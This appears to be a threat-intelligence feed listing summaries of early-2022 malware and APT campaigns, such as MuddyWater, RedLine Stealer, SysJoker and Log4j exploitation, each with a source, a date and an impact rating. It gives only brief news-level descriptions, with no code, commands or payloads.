- The Microsoft Threat Intelligence Center has detected activity from attackers who have started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. These attacks are performed by a China-based ransomware operator that Microsoft tracks as DEV-0401.
MuddyWater_MOIS
HIGH
- Intel Source:
- US cyber command
- Intel Name:
- MuddyWater_MOIS
- Date of Scan:
- 2022-01-13
- Impact:
- HIGH
- Summary:
- U.S. Cyber Command's Cyber National Mission Force (CNMF) has identified multiple open-source tools used by an Iranian advanced persistent threat (APT) group known as MuddyWater. The techniques used by the APT group include side-loading DLLs in order to trick legitimate programs into running malware and obfuscating PowerShell scripts to hide command-and-control functions.
GootLoader Campaign
MEDIUM
- Intel Source:
- eSentire
- Intel Name:
- GootLoader Campaign
- Date of Scan:
- 2022-01-13
- Impact:
- MEDIUM
- Summary:
- eSentire researchers found that operators of the GootLoader campaign are targeting employees of accounting and law firms. GootLoader is a stealthy initial-access malware which, after getting a foothold on the victim's computer system, infects the system with ransomware or other lethal malware.
Patchwork APT
LOW
- Intel Source:
- MalwareBytes
- Intel Name:
- Patchwork APT
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- Malwarebytes Labs has analysed a campaign in which the Patchwork APT used malicious RTF files to drop a variant of the BADNEWS Remote Administration Trojan (RAT).
RedLine Stealer
MEDIUM
- Intel Source:
- Fortinet
- Intel Name:
- RedLine Stealer
- Date of Scan:
- 2022-01-12
- Impact:
- MEDIUM
- Summary:
- Researchers at Fortinet have identified an executable file, 'Omicron Stats.exe', which is attributed to a variant of the RedLine Stealer malware. Researchers have analysed the new RedLine variant, its core functions, how it communicates with its C2 server and how organizations can protect themselves.
Nanocore Netwire and AsyncRAT
HIGH
- Intel Source:
- Cisco Talos
- Intel Name:
- Nanocore Netwire and AsyncRAT
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- Cisco Talos researchers discovered a new attack campaign using public cloud infrastructure to spread RATs; those RATs are Nanocore, Netwire and AsyncRAT.
ABCbot
LOW
- Intel Source:
- Cado security
- Intel Name:
- ABCbot
- Date of Scan:
- 2022-01-12
- Impact:
- LOW
- Summary:
- Cado Security researchers analyzed Abcbot and found its link with the Xanthe-based cryptojacking campaign. The same threat actor is responsible for both Xanthe and Abcbot and is shifting its objective from mining cryptocurrency on compromised hosts to activities more traditionally associated with botnets, such as DDoS attacks.
STR Omega 1/12/22
HIGH
- Intel Source:
- STR
- Intel Name:
- STR Omega 1/12/22
- Date of Scan:
- 2022-01-12
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
APT35
HIGH
- Intel Source:
- Checkpoint
- Intel Name:
- APT35
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- CheckPoint researchers discovered that APT35 has started widespread scanning and attempts to leverage the Log4j flaw in publicly facing systems.
SysJoker Backdoor
HIGH
- Intel Source:
- Intezer
- Intel Name:
- SysJoker Backdoor
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- Researchers from Intezer discovered a new multi-platform backdoor that targets Windows, Mac and Linux. The backdoor was named SysJoker. SysJoker masquerades as a system update and generates its C2 address by decoding a string retrieved from a text file hosted on Google Drive.
Trojanized dnspy app campaign
HIGH
- Intel Source:
- STR
- Intel Name:
- Trojanized dnspy app campaign
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
VMware Horizon Exploitation Using Log4J
HIGH
- Intel Source:
- STR
- Intel Name:
- VMware Horizon Exploitation Using Log4J
- Date of Scan:
- 2022-01-11
- Impact:
- HIGH
- Summary:
- This research is part of Securonix Threat Labs - Threat Research Team
TA551 IcedID
MEDIUM
- Intel Source:
- Palo Alto
- Intel Name:
- TA551 IcedID
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Palo Alto Unit 42 researchers have tracked TA551 activity in which the threat actor uses Word documents with both German and Italian templates, later delivering IcedID malware.
Web Skimmer Campaign
MEDIUM
- Intel Source:
- Palo Alto
- Intel Name:
- Web Skimmer Campaign
- Date of Scan:
- 2022-01-06
- Impact:
- MEDIUM
- Summary:
- Researchers at Unit 42 have found a supply chain attack leveraging a cloud video platform to distribute skimmer (aka formjacking) campaigns. In skimmer attacks, cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site's HTML form page to collect sensitive user information.
Zloader Banking Malware Campaign
MEDIUM
- Intel Source:
- Checkpoint
- Intel Name:
- Zloader Banking Malware Campaign
- Date of Scan:
- 2022-01-05
- Impact:
- MEDIUM
- Summary:
- The Checkpoint Research Team has been tracking the Zloader campaign and identified evidence that the new campaign was first seen around early November 2021. The techniques incorporated in the infection chain include the use of legitimate remote management (RMM) software to gain initial access to the target machine.